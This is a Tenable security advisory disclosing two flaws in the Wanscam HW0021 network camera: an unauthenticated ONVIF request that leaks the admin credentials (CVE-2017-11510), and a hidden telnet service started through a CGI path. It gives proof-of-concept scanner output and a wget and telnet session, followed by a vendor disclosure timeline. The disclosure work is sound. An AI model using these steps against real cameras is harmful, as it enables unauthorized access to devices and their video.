Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Wanscam Network Camera Multiple Vulnerabiltiies

Medium
← View More Research Advisories

Synopsis

While investigating Pierre Kim's disclosure, Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server, Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities FSecure encountered in Foscam devices. Its unclear to Tenable how Foscam and Wanscam are related.

CVE-2017-11510: Administrator Username and Password Disclosure

The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation: 
LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl 
----------[ Executing onvif_detect.nbin ]------

The ONVIF service listening on UDP port 3702 advertises
the following information:

Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0

audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:

http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media

----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------

It was possible to obtain a screenshot from the following URL
on the remote camera: 

http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&

----------[ Finished ./onvif_get_snapshot.nasl ]------
You can see the username (admin) and password (cheesedoodle) in the final plugin.

Hidden Telnet Functionality

Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi then telnetd starts up. 
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
albinolobster@ubuntu:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.

IPCamera login:

Solution

A patch has not been published.

Additional References

http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdf

Disclosure Timeline

08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected] [email protected] [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenables responds that we understand that but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2017-11510
Tenable Advisory ID: TRA-2017-33
Credit:
Jacob Baines, Tenable Network Security
CVSSv2 Base / Temporal Score:
5.0 / 5.0
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:P/I:N/A:N
Affected Products:
Wanscam HW0021 firmware 11.6.5.1.1-20161213
Risk Factor:
Medium

Advisory Timeline

2017-11-10 - [R1] Initial Release
Try for Free Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try for Free Buy Now

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Buy Now
Renew an existing license | Find a reseller
Try for Free Buy Now

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training

Buy Now
Renew an existing license | Find a reseller